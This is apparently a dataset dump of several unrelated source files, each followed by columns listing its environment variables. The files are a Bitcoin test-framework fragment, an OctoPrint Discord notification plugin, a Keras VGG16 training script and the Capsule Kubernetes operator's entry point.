block_time += 10 * 60
# Must sync before next peer starts generating blocks
sync_blocks(self.nodes)
# Shut them down, and clean up cache directories:
self.stop_nodes()
self.nodes = []
self.mocktime = 0
def cache_path(n, *paths):
return os.path.join(get_datadir_path(
self.options.cachedir, n), "regtest", *paths)
for i in range(MAX_NODES):
# Remove empty wallets dir
os.rmdir(cache_path(i, 'wallets'))
for entry in os.listdir(cache_path(i)):
if entry not in ['chainstate', 'blocks']:
os.remove(cache_path(i, entry))
for i in range(self.num_nodes):
from_dir = get_datadir_path(self.options.cachedir, i)
to_dir = get_datadir_path(self.options.tmpdir, i)
shutil.copytree(from_dir, to_dir)
# Overwrite port/rpcport in bitcoin.conf
initialize_datadir(self.options.tmpdir, i)
def _initialize_chain_clean(self):
"""Initialize empty blockchain for use by the test.
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization."""
for i in range(self.num_nodes):
initialize_datadir(self.options.tmpdir, i)
def skip_if_no_py3_zmq(self):
"""Attempt to import the zmq package and skip the test if the import fails."""
try:
import zmq # noqa
except ImportError:
raise SkipTest("python3-zmq module not available.")
def skip_if_no_bitcoind_zmq(self):
"""Skip the running test if bitcoind has not been compiled with zmq support."""
if not self.is_zmq_compiled():
raise SkipTest("bitcoind has not been built with zmq enabled.")
def skip_if_no_wallet(self):
"""Skip the running test if wallet has not been compiled."""
if not self.is_wallet_compiled():
raise SkipTest("wallet has not been compiled.")
def skip_if_no_cli(self):
"""Skip the running test if bitcoin-cli has not been compiled."""
if not self.is_cli_compiled():
raise SkipTest("bitcoin-cli has not been compiled.")
def is_cli_compiled(self):
"""Checks whether bitcoin-cli was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_UTILS")
def is_wallet_compiled(self):
"""Checks whether the wallet module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_WALLET")
def is_zmq_compiled(self):
"""Checks whether the zmq module was compiled."""
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile, encoding='utf-8'))
return config["components"].getboolean("ENABLE_ZMQ")
| []
| []
| [
"BITCOINCLI",
"PATH",
"BITCOIND"
]
| [] | ["BITCOINCLI", "PATH", "BITCOIND"] | python | 3 | 0 | |
octoprint_discordremote/__init__.py | # coding=utf-8
from __future__ import absolute_import
import threading
import time
from base64 import b64decode
from datetime import timedelta, datetime
import humanfriendly
import octoprint.plugin
import octoprint.settings
import os
import requests
import socket
import subprocess
import logging
from PIL import Image
from flask import make_response
from io import BytesIO
from octoprint.server import user_permission
from requests import ConnectionError
from threading import Thread, Event
from octoprint_discordremote.libs import ipgetter
from octoprint_discordremote.command import Command
from octoprint_discordremote.embedbuilder import info_embed
from .discord import Discord
class DiscordRemotePlugin(octoprint.plugin.EventHandlerPlugin,
octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.SettingsPlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.TemplatePlugin,
octoprint.plugin.ProgressPlugin,
octoprint.plugin.SimpleApiPlugin):
def __init__(self):
self.discord = None
self.command = None
self.last_progress_message = None
self.last_progress_percent = 0
self.is_muted = False
self.periodic_signal = None
self.periodic_thread = None
# Events definition here (better for intellisense in IDE)
# referenced in the settings too.
self.events = {
"startup": {
"name": "Octoprint Startup",
"enabled": True,
"with_snapshot": False,
"message": "⏰ I just woke up! What are we gonna print today?\n"
"Local IP: {ipaddr} External IP: {externaddr}"
},
"shutdown": {
"name": "Octoprint Shutdown",
"enabled": True,
"with_snapshot": False,
"message": "💤 Going to bed now!"
},
"printer_state_operational": {
"name": "Printer state : operational",
"enabled": True,
"with_snapshot": False,
"message": "✅ Your printer is operational."
},
"printer_state_error": {
"name": "Printer state : error",
"enabled": True,
"with_snapshot": False,
"message": "⚠️ Your printer is in an erroneous state."
},
"printer_state_unknown": {
"name": "Printer state : unknown",
"enabled": True,
"with_snapshot": False,
"message": "❔ Your printer is in an unknown state."
},
"printing_started": {
"name": "Printing process : started",
"enabled": True,
"with_snapshot": True,
"message": "🖨️ I've started printing {path}"
},
"printing_paused": {
"name": "Printing process : paused",
"enabled": True,
"with_snapshot": True,
"message": "⏸️ The printing was paused."
},
"printing_resumed": {
"name": "Printing process : resumed",
"enabled": True,
"with_snapshot": True,
"message": "▶️ The printing was resumed."
},
"printing_cancelled": {
"name": "Printing process : cancelled",
"enabled": True,
"with_snapshot": True,
"message": "🛑 The printing was stopped."
},
"printing_done": {
"name": "Printing process : done",
"enabled": True,
"with_snapshot": True,
"message": "👍 Printing is done! Took about {time_formatted}"
},
"printing_failed": {
"name": "Printing process : failed",
"enabled": True,
"with_snapshot": True,
"message": "👎 Printing has failed! :("
},
"printing_progress": {
"name": "Printing progress (Percentage)",
"enabled": True,
"with_snapshot": True,
"message": "📢 Printing is at {progress}%",
"step": 10
},
"printing_progress_periodic": {
"name": "Printing progress (Periodic)",
"enabled": False,
"with_snapshot": True,
"message": "📢 Printing is at {progress}%",
"period": 300
},
"test": { # Not a real message, but we will treat it as one
"enabled": True,
"with_snapshot": True,
"message": "Hello hello! If you see this message, it means that the settings are correct!"
},
}
self.permissions = {
'1': {'users': '*', 'commands': ''},
'2': {'users': '', 'commands': ''},
'3': {'users': '', 'commands': ''},
'4': {'users': '', 'commands': ''},
'5': {'users': '', 'commands': ''}
}
def configure_discord(self, send_test=False):
# Configure discord
if self.command is None:
self.command = Command(self)
if self.discord is None:
self.discord = Discord()
self.discord.configure_discord(self._settings.get(['bottoken'], merged=True),
self._settings.get(['channelid'], merged=True),
self._logger,
self.command,
self.update_discord_status)
if send_test:
self.notify_event("test")
def on_after_startup(self):
# Use a different log file for DiscordRemote, as it is very noisy.
self._logger = logging.getLogger("octoprint.plugins.discordremote")
from octoprint.logging.handlers import CleaningTimedRotatingFileHandler
hdlr = CleaningTimedRotatingFileHandler(
self._settings.get_plugin_logfile_path(), when="D", backupCount=3)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
self._logger.addHandler(hdlr)
# Initialise DiscordRemote
self._logger.info("DiscordRemote is started !")
self.configure_discord(False)
# Transition settings
allowed_users = self._settings.get(['allowedusers'], merged=True)
if allowed_users:
self._settings.set(["allowedusers"], None, True)
self._settings.set(['permissions'], {'1': {'users': allowed_users, 'commands': ''}}, True)
self.send_message(None, "⚠️⚠️⚠️ Allowed users has been changed to a more granular system. "
"Check the DiscordRemote settings and check that it is suitable⚠️⚠️⚠️")
# ShutdownPlugin mixin
def on_shutdown(self):
self._logger.info("DiscordRemote is shutting down.")
self.discord.shutdown_discord()
self._logger.info("Discord bot has excited cleanly.")
# SettingsPlugin mixin
def get_settings_defaults(self):
return {
'bottoken': "",
'channelid': "",
'baseurl': "",
'prefix': "/",
'show_local_ip': 'auto',
'show_external_ip': 'auto',
'use_hostname': False,
'hostname': "YOUR.HOST.NAME",
'use_hostname_only': False,
'events': self.events,
'permissions': self.permissions,
'allow_scripts': False,
'script_before': '',
'script_after': '',
'allowed_gcode': ''
}
# Restricts some paths to some roles only
def get_settings_restricted_paths(self):
# settings.events.tests is a false message, so we should never see it as configurable.
# settings.bottoken and channelid are admin only.
return dict(never=[["events", "test"]],
admin=[["bottoken"],
["channelid"],
["permissions"],
['baseurl'],
['prefix'],
["show_local_ip"],
["show_external_ip"],
["use_hostname"],
["hostname"],
["use_hostname_only"],
['script_before'],
['script_after'],
['allowed_gcode']])
# AssetPlugin mixin
def get_assets(self):
# Define your plugin's asset files to automatically include in the
# core UI here.
return dict(
js=["js/discordremote.js"],
css=["css/discordremote.css"],
less=["less/discordremote.less"]
)
# TemplatePlugin mixin
def get_template_configs(self):
return [
dict(type="settings", custom_bindings=False)
]
# Softwareupdate hook
def get_update_information(self):
# Define the configuration for your plugin to use with the Software Update
# Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
# for details.
return dict(
discordremote=dict(
displayName="DiscordRemote Plugin",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="cameroncros",
repo="OctoPrint-DiscordRemote",
current=self._plugin_version,
# update method: pip
pip="https://github.com/cameroncros/OctoPrint-DiscordRemote/archive/{target_version}.zip"
)
)
# EventHandlerPlugin hook
def on_event(self, event, payload):
if event == "Startup":
return self.notify_event("startup")
if event == "Shutdown":
return self.notify_event("shutdown")
if event == "PrinterStateChanged":
if payload["state_id"] == "OPERATIONAL":
return self.notify_event("printer_state_operational")
elif payload["state_id"] == "ERROR":
return self.notify_event("printer_state_error")
elif payload["state_id"] == "UNKNOWN":
return self.notify_event("printer_state_unknown")
if event == "PrintStarted":
self.start_periodic_reporting()
return self.notify_event("printing_started", payload)
if event == "PrintPaused":
return self.notify_event("printing_paused", payload)
if event == "PrintResumed":
return self.notify_event("printing_resumed", payload)
if event == "PrintCancelled":
return self.notify_event("printing_cancelled", payload)
if event == "PrintDone":
self.stop_periodic_reporting()
payload['time_formatted'] = timedelta(seconds=int(payload["time"]))
return self.notify_event("printing_done", payload)
return True
def on_print_progress(self, location, path, progress):
# Avoid sending duplicate percentage progress messages
if progress != self.last_progress_percent:
self.last_progress_percent = progress
self.notify_event("printing_progress", {"progress": progress})
def on_settings_save(self, data):
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
self._logger.info("Settings have saved. Send a test message...")
thread = threading.Thread(target=self.configure_discord, args=(True,))
thread.start()
# SimpleApiPlugin mixin
def get_api_commands(self):
return dict(
executeCommand=['args'],
sendMessage=[]
)
def on_api_command(self, comm, data):
if not user_permission.can():
return make_response("Insufficient rights", 403)
if comm == 'executeCommand':
return self.execute_command(data)
if comm == 'sendMessage':
return self.unpack_message(data)
def execute_command(self, data):
args = ""
if 'args' in data:
args = data['args']
snapshots, embeds = self.command.parse_command(args)
if not self.discord.send(snapshots=snapshots, embeds=embeds):
return make_response("Failed to send message", 404)
def unpack_message(self, data):
builder = embedbuilder.EmbedBuilder()
if 'title' in data:
builder.set_title(data['title'])
if 'author' in data:
builder.set_author(data['author'])
if 'color' in data:
builder.set_color(data['color'])
if 'description' in data:
builder.set_description(data['description'])
if 'image' in data:
b64image = data['image']
imagename = data.get('imagename', 'snapshot.png')
bytes = b64decode(b64image)
image = BytesIO(bytes)
builder.set_image((imagename, image))
if not self.discord.send(embeds=builder.get_embeds()):
return make_response("Failed to send message", 404)
def notify_event(self, event_id, data=None):
self._logger.info("Received event: %s" % event_id)
if self.is_muted:
return True
if data is None:
data = {}
if event_id not in self.events:
self._logger.error("Tried to notify on non-existant eventID : ", event_id)
return False
tmp_config = self._settings.get(["events", event_id], merged=True)
if not tmp_config["enabled"]:
self._logger.debug("Event {} is not enabled. Returning gracefully".format(event_id))
return False
# Store IP address for message
data['ipaddr'] = self.get_ip_address()
data['externaddr'] = self.get_external_ip_address()
data['timeremaining'] = self.get_print_time_remaining()
data['timespent'] = self.get_print_time_spent()
# Special case for progress eventID : we check for progress and steps
if event_id == 'printing_progress':
# Skip if just started
if int(data["progress"]) == 0:
return False
# Skip if not a multiple of the given interval
if int(data["progress"]) % int(tmp_config["step"]) != 0:
return False
# Always send last message, and reset timer.
if int(data["progress"]) == 100:
self.last_progress_message = None
done_config = self._settings.get(["events", "printing_done"], merged=True)
# Don't send last message if the "printing_done" event is enabled.
if done_config["enabled"]:
return False
# Otherwise work out if time since last message has passed.
try:
min_progress_time = timedelta(seconds=int(tmp_config["timeout"]))
if self.last_progress_message is not None \
and self.last_progress_message > (datetime.now() - min_progress_time):
return False
except ValueError:
pass
except KeyError:
pass
self.last_progress_message = datetime.now()
return self.send_message(event_id, tmp_config["message"].format(**data), tmp_config["with_snapshot"])
def get_ip_address(self):
if self._settings.get(['show_local_ip'], merged=True) == 'hostname':
return self._settings.get(['hostname'], merged=True)
elif self._settings.get(['show_local_ip'], merged=True) == 'auto':
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
return s.getsockname()[0]
except Exception as e:
print(e)
return '127.0.0.1'
finally:
s.close()
else:
return None
def get_external_ip_address(self):
if self._settings.get(['show_local_ip'], merged=True) == 'hostname':
return self._settings.get(['hostname'], merged=True)
elif self._settings.get(['show_local_ip'], merged=True) == 'auto':
return ipgetter.myip()
else:
return None
def get_port(self):
port = self.get_settings().global_get(["plugins", "discovery", "publicPort"])
if port:
return port
port = self.get_settings().global_get(["server", "port"])
if port:
return port
return 5000 # Default to a sane value
def exec_script(self, event_name, which=""):
# I want to be sure that the scripts are allowed by the special configuration flag
scripts_allowed = self._settings.get(["allow_scripts"], merged=True)
if scripts_allowed is None or scripts_allowed is False:
return ""
# Finding which one should be used.
script_to_exec = None
if which == "before":
script_to_exec = self._settings.get(["script_before"], merged=True)
elif which == "after":
script_to_exec = self._settings.get(["script_after"], merged=True)
# Finally exec the script
out = ""
self._logger.info("{}:{} File to start: '{}'".format(event_name, which, script_to_exec))
try:
if script_to_exec is not None and len(script_to_exec) > 0 and os.path.exists(script_to_exec):
out = subprocess.check_output(script_to_exec)
except (OSError, subprocess.CalledProcessError) as err:
out = err
finally:
self._logger.info("{}:{} > Output: '{}'".format(event_name, which, out))
return out
def send_message(self, event_id, message, with_snapshot=False):
# exec "before" script if any
self.exec_script(event_id, "before")
# Get snapshot if asked for
snapshot = None
if with_snapshot:
snapshots = self.get_snapshot()
if snapshots and len(snapshots) == 1:
snapshot = snapshots[0]
# Send to Discord bot (Somehow events can happen before discord bot has been created and initialised)
if self.discord is None:
self.discord = Discord()
out = self.discord.send(embeds=info_embed(author=self.get_printer_name(),
title=message,
snapshot=snapshot))
if not out:
self._logger.error("Failed to send message")
return out
# exec "after" script if any
self.exec_script(event_id, "after")
return out
def get_snapshot(self):
if 'FAKE_SNAPSHOT' in os.environ:
return self.get_snapshot_fake()
else:
return self.get_snapshot_camera()
@staticmethod
def get_snapshot_fake():
fl = open(os.environ['FAKE_SNAPSHOT'], "rb")
return [("snapshot.png", fl)]
def get_snapshot_camera(self):
snapshot = None
snapshot_url = self._settings.global_get(["webcam", "snapshot"])
if snapshot_url is None:
return None
if "http" in snapshot_url:
try:
snapshot_call = requests.get(snapshot_url)
if not snapshot_call:
return None
snapshot = BytesIO(snapshot_call.content)
except ConnectionError:
return None
if snapshot_url.startswith("file://"):
snapshot = open(snapshot_url.partition('file://')[2], "rb")
if snapshot is None:
return None
# Get the settings used for streaming to know if we should transform the snapshot
must_flip_h = self._settings.global_get_boolean(["webcam", "flipH"])
must_flip_v = self._settings.global_get_boolean(["webcam", "flipV"])
must_rotate = self._settings.global_get_boolean(["webcam", "rotate90"])
# Only call Pillow if we need to transpose anything
if must_flip_h or must_flip_v or must_rotate:
img = Image.open(snapshot)
self._logger.info(
"Transformations : FlipH={}, FlipV={} Rotate={}".format(must_flip_h, must_flip_v, must_rotate))
if must_flip_h:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
if must_flip_v:
img = img.transpose(Image.FLIP_TOP_BOTTOM)
if must_rotate:
img = img.transpose(Image.ROTATE_90)
new_image = BytesIO()
img.save(new_image, 'png')
return [("snapshot.png", new_image)]
return [("snapshot.png", snapshot)]
def get_printer_name(self):
printer_name = self._settings.global_get(["appearance", "name"])
if printer_name is None:
printer_name = "OctoPrint"
return printer_name
def update_discord_status(self, connected):
self._plugin_manager.send_plugin_message(self._identifier, dict(isConnected=connected))
def mute(self):
self.is_muted = True
def unmute(self):
self.is_muted = False
def get_file_manager(self):
return self._file_manager
def get_settings(self):
return self._settings
def get_printer(self):
return self._printer
def get_plugin_manager(self):
return self._plugin_manager
def get_print_time_spent(self):
current_data = self._printer.get_current_data()
try:
current_time_val = current_data['progress']['printTime']
return humanfriendly.format_timespan(current_time_val, max_units=2)
except (KeyError, ValueError):
return 'Unknown'
def get_print_time_remaining(self):
current_data = self._printer.get_current_data()
try:
remaining_time_val = current_data['progress']['printTimeLeft']
return humanfriendly.format_timespan(remaining_time_val, max_units=2)
except (KeyError, ValueError):
return 'Unknown'
def start_periodic_reporting(self):
self.stop_periodic_reporting()
self.last_progress_percent = 0
self.periodic_signal = Event()
self.periodic_signal.clear()
self.periodic_thread = Thread(target=self.periodic_reporting)
self.periodic_thread.start()
def stop_periodic_reporting(self):
if self.periodic_signal is None or self.periodic_thread is None:
return
self.periodic_signal.set()
self.periodic_thread.join(timeout=60)
if self.periodic_thread.is_alive():
self._logger.error("Periodic thread has hung, leaking it now.")
else:
self._logger.info("Periodic thread joined.")
self.periodic_thread = None
self.periodic_signal = None
def periodic_reporting(self):
if not self._settings.get(["events", "printing_progress_periodic", "enabled"]):
return
timeout = self._settings.get(["events", "printing_progress_periodic", "period"])
while True:
cur_time = time.time()
next_time = cur_time + int(timeout)
while time.time() < next_time:
time.sleep(1)
if self.periodic_signal.is_set():
return
if not self._printer.is_printing():
return
self.notify_event("printing_progress_periodic", data={"progress": self.last_progress_percent})
# If you want your plugin to be registered within OctoPrint under a different name than what you defined in setup.py
# ("OctoPrint-PluginSkeleton"), you may define that here. Same goes for the other metadata derived from setup.py that
# can be overwritten via __plugin_xyz__ control properties. See the documentation for that.
__plugin_name__ = "DiscordRemote"
__plugin_pythoncompat__ = ">=2.7,<4"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = DiscordRemotePlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information
}
| []
| []
| [
"FAKE_SNAPSHOT"
]
| [] | ["FAKE_SNAPSHOT"] | python | 1 | 0 | |
keras/training/train_vgg16x.py | from __future__ import print_function
import math, json, os, pickle, sys
import keras
from keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Conv2D, MaxPooling2D
from keras.models import Model, Sequential
from keras.optimizers import SGD
from keras.preprocessing.image import ImageDataGenerator
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
DATADIR = "/storage/plzen1/home/radekj/vmmr"
name = "vgg16x"
log_file = "{}_history_log.csv".format(name)
csv_logger = CSVLogger(log_file, append=True)
SIZE = (224, 224)
BATCH_SIZE = 64
EPOCH = 10
num_classes = 5
input_shape = (224, 224, 3)
def get_model():
model = keras.applications.vgg16.VGG16()
return model
def train_vgg(folder):
DATA_DIR = folder
TRAIN_DIR = os.path.join(DATA_DIR, 'train')
VALID_DIR = os.path.join(DATA_DIR, 'valid')
TEST_DIR = os.path.join(DATA_DIR, 'test')
save_aug = os.path.join(DATA_DIR, 'tmp')
num_train_samples = sum([len(files) for r, d, files in os.walk(TRAIN_DIR)])
num_valid_samples = sum([len(files) for r, d, files in os.walk(VALID_DIR)])
num_train_steps = math.floor(num_train_samples / BATCH_SIZE)
num_valid_steps = math.floor(num_valid_samples / BATCH_SIZE)
train_gen = ImageDataGenerator()
batches = train_gen.flow_from_directory(
directory=TRAIN_DIR,
target_size=SIZE,
color_mode="rgb",
batch_size=BATCH_SIZE,
class_mode="categorical",
shuffle=True,
)
val_gen = ImageDataGenerator()
val_batches = val_gen.flow_from_directory(
directory=VALID_DIR,
target_size=SIZE,
color_mode="rgb",
batch_size=BATCH_SIZE,
class_mode="categorical",
shuffle=True,
)
model = get_model()
classes = list(iter(batches.class_indices))
model.layers.pop()
for layer in model.layers:
layer.trainable = False
last = model.layers[-1].output
x = Dense(len(classes), activation="softmax")(last)
finetuned_model = Model(model.input, x)
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
finetuned_model.compile(optimizer=sgd, loss='categorical_crossentropy',
metrics=['accuracy'])
for c in batches.class_indices:
classes[batches.class_indices[c]] = c
finetuned_model.classes = classes
early_stopping = EarlyStopping(patience=10)
check_pointer = ModelCheckpoint("{}_best.h5".format(name), verbose=1, save_best_only=True)
history = finetuned_model.fit_generator(batches, steps_per_epoch=num_train_steps, epochs=EPOCH,
callbacks=[csv_logger, early_stopping, check_pointer],
validation_data=val_batches, validation_steps=num_valid_steps)
model.save("{}_final.h5".format(name))
if __name__ == '__main__':
print(len(sys.argv))
if len(sys.argv) < 2:
print("Need param: python train_vgg16.py dataset_path")
exit(1)
folder = str(sys.argv[1])
exists = os.path.isdir(folder)
if not exists:
print("Folder '{}' not found.".format(folder))
exit(1)
exists = os.path.isfile(log_file)
if not exists:
f = open(log_file, "w+")
f.write("====== start ====")
f.close()
print("===== folder: {}".format(folder))
train_vgg(folder)
print("===== end.")
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
main.go | /*
Copyright 2020 Clastix Labs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"fmt"
"os"
"regexp"
goRuntime "runtime"
"go.uber.org/zap/zapcore"
"k8s.io/apimachinery/pkg/runtime"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
clientgoscheme "k8s.io/client-go/kubernetes/scheme"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/healthz"
"sigs.k8s.io/controller-runtime/pkg/log/zap"
capsulev1alpha1 "github.com/clastix/capsule/api/v1alpha1"
"github.com/clastix/capsule/controllers"
"github.com/clastix/capsule/controllers/rbac"
"github.com/clastix/capsule/controllers/secret"
"github.com/clastix/capsule/controllers/servicelabels"
"github.com/clastix/capsule/pkg/indexer"
"github.com/clastix/capsule/pkg/webhook"
"github.com/clastix/capsule/pkg/webhook/ingress"
"github.com/clastix/capsule/pkg/webhook/namespacequota"
"github.com/clastix/capsule/pkg/webhook/networkpolicies"
"github.com/clastix/capsule/pkg/webhook/ownerreference"
"github.com/clastix/capsule/pkg/webhook/pvc"
"github.com/clastix/capsule/pkg/webhook/registry"
"github.com/clastix/capsule/pkg/webhook/services"
"github.com/clastix/capsule/pkg/webhook/tenant"
"github.com/clastix/capsule/pkg/webhook/tenantprefix"
"github.com/clastix/capsule/pkg/webhook/utils"
// +kubebuilder:scaffold:imports
)
var (
scheme = runtime.NewScheme()
setupLog = ctrl.Log.WithName("setup")
)
func init() {
utilruntime.Must(clientgoscheme.AddToScheme(scheme))
utilruntime.Must(capsulev1alpha1.AddToScheme(scheme))
// +kubebuilder:scaffold:scheme
}
func printVersion() {
setupLog.Info(fmt.Sprintf("Capsule Version %s %s%s", GitTag, GitCommit, GitDirty))
setupLog.Info(fmt.Sprintf("Build from: %s", GitRepo))
setupLog.Info(fmt.Sprintf("Build date: %s", BuildTime))
setupLog.Info(fmt.Sprintf("Go Version: %s", goRuntime.Version()))
setupLog.Info(fmt.Sprintf("Go OS/Arch: %s/%s", goRuntime.GOOS, goRuntime.GOARCH))
}
func main() {
var metricsAddr string
var enableLeaderElection bool
var forceTenantPrefix bool
var v bool
var capsuleGroup string
var protectedNamespaceRegexpString string
var protectedNamespaceRegexp *regexp.Regexp
var allowTenantIngressHostnamesCollision bool
var allowIngressHostnamesCollision bool
var namespace string
flag.StringVar(&metricsAddr, "metrics-addr", ":8080", "The address the metric endpoint binds to.")
flag.StringVar(&capsuleGroup, "capsule-user-group", capsulev1alpha1.GroupVersion.Group, "Name of the group for capsule users")
flag.BoolVar(&enableLeaderElection, "enable-leader-election", false,
"Enable leader election for controller manager. "+
"Enabling this will ensure there is only one active controller manager.")
flag.BoolVar(&v, "version", false, "Print the Capsule version and exit")
flag.BoolVar(&forceTenantPrefix, "force-tenant-prefix", false, "Enforces the Tenant owner, "+
"during Namespace creation, to name it using the selected Tenant name as prefix, separated by a dash. "+
"This is useful to avoid Namespace name collision in a public CaaS environment.")
flag.StringVar(&protectedNamespaceRegexpString, "protected-namespace-regex", "", "Disallow creation of namespaces, whose name matches this regexp")
flag.BoolVar(
&allowTenantIngressHostnamesCollision,
"allow-tenant-ingress-hostnames-collision",
false,
"When defining the exact match for allowed Ingress hostnames at Tenant level, a collision is not allowed. "+
"Toggling this, Capsule will not check if a hostname collision is in place, allowing the creation of "+
"two or more Tenant resources although sharing the same allowed hostname(s).",
)
flag.BoolVar(&allowIngressHostnamesCollision, "allow-ingress-hostname-collision", true, "Allow the Ingress hostname collision at Ingress resource level across all the Tenants.")
opts := zap.Options{
EncoderConfigOptions: append([]zap.EncoderConfigOption{}, func(config *zapcore.EncoderConfig) {
config.EncodeTime = zapcore.ISO8601TimeEncoder
}),
}
opts.BindFlags(flag.CommandLine)
flag.Parse()
ctrl.SetLogger(zap.New(zap.UseFlagOptions(&opts)))
printVersion()
if v {
os.Exit(0)
}
if namespace = os.Getenv("NAMESPACE"); len(namespace) == 0 {
setupLog.Error(fmt.Errorf("unable to determinate the Namespace Capsule is running on"), "unable to start manager")
os.Exit(1)
}
mgr, err := ctrl.NewManager(ctrl.GetConfigOrDie(), ctrl.Options{
Scheme: scheme,
MetricsBindAddress: metricsAddr,
Port: 9443,
LeaderElection: enableLeaderElection,
LeaderElectionID: "42c733ea.clastix.capsule.io",
HealthProbeBindAddress: ":10080",
})
if err != nil {
setupLog.Error(err, "unable to start manager")
os.Exit(1)
}
if len(protectedNamespaceRegexpString) > 0 {
protectedNamespaceRegexp, err = regexp.Compile(protectedNamespaceRegexpString)
if err != nil {
setupLog.Error(err, "unable to compile protected-namespace-regex", "protected-namespace-regex", protectedNamespaceRegexp)
os.Exit(1)
}
}
majorVer, minorVer, _, err := utils.GetK8sVersion()
if err != nil {
setupLog.Error(err, "unable to get kubernetes version")
os.Exit(1)
}
_ = mgr.AddReadyzCheck("ping", healthz.Ping)
_ = mgr.AddHealthzCheck("ping", healthz.Ping)
setupLog.Info("starting with following options:", "metricsAddr", metricsAddr, "enableLeaderElection", enableLeaderElection, "forceTenantPrefix", forceTenantPrefix)
if err = (&controllers.TenantReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("Tenant"),
Scheme: mgr.GetScheme(),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Tenant")
os.Exit(1)
}
// +kubebuilder:scaffold:builder
// webhooks: the order matters, don't change it and just append
wl := append(
make([]webhook.Webhook, 0),
ingress.Webhook(ingress.Handler(allowIngressHostnamesCollision)),
pvc.Webhook(pvc.Handler()),
registry.Webhook(registry.Handler()),
services.Webhook(services.Handler()),
ownerreference.Webhook(utils.InCapsuleGroup(capsuleGroup, ownerreference.Handler(forceTenantPrefix))),
namespacequota.Webhook(utils.InCapsuleGroup(capsuleGroup, namespacequota.Handler())),
networkpolicies.Webhook(utils.InCapsuleGroup(capsuleGroup, networkpolicies.Handler())),
tenantprefix.Webhook(utils.InCapsuleGroup(capsuleGroup, tenantprefix.Handler(forceTenantPrefix, protectedNamespaceRegexp))),
tenant.Webhook(tenant.Handler(allowTenantIngressHostnamesCollision)),
)
if err = webhook.Register(mgr, wl...); err != nil {
setupLog.Error(err, "unable to setup webhooks")
os.Exit(1)
}
rbacManager := &rbac.Manager{
Log: ctrl.Log.WithName("controllers").WithName("Rbac"),
CapsuleGroup: capsuleGroup,
}
if err = mgr.Add(rbacManager); err != nil {
setupLog.Error(err, "unable to create cluster roles")
os.Exit(1)
}
if err = rbacManager.SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Rbac")
os.Exit(1)
}
if err = (&secret.CAReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("CA"),
Scheme: mgr.GetScheme(),
Namespace: namespace,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Namespace")
os.Exit(1)
}
if err = (&secret.TLSReconciler{
Client: mgr.GetClient(),
Log: ctrl.Log.WithName("controllers").WithName("Tls"),
Scheme: mgr.GetScheme(),
Namespace: namespace,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "Namespace")
os.Exit(1)
}
if err = (&servicelabels.ServicesLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("ServiceLabels"),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "ServiceLabels")
os.Exit(1)
}
if err = (&servicelabels.EndpointsLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("EndpointLabels"),
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "EndpointLabels")
os.Exit(1)
}
if err = (&servicelabels.EndpointSlicesLabelsReconciler{
Log: ctrl.Log.WithName("controllers").WithName("EndpointSliceLabels"),
VersionMinor: minorVer,
VersionMajor: majorVer,
}).SetupWithManager(mgr); err != nil {
setupLog.Error(err, "unable to create controller", "controller", "EndpointSliceLabels")
}
if err = indexer.AddToManager(mgr); err != nil {
setupLog.Error(err, "unable to setup indexers")
os.Exit(1)
}
setupLog.Info("starting manager")
if err = mgr.Start(ctrl.SetupSignalHandler()); err != nil {
setupLog.Error(err, "problem running manager")
os.Exit(1)
}
}
| [
"\"NAMESPACE\""
]
| []
| [
"NAMESPACE"
]
| [] | ["NAMESPACE"] | go | 1 | 0 | |
tests/basicswap/extended/test_xmr_persistent.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""
export RESET_TEST=true
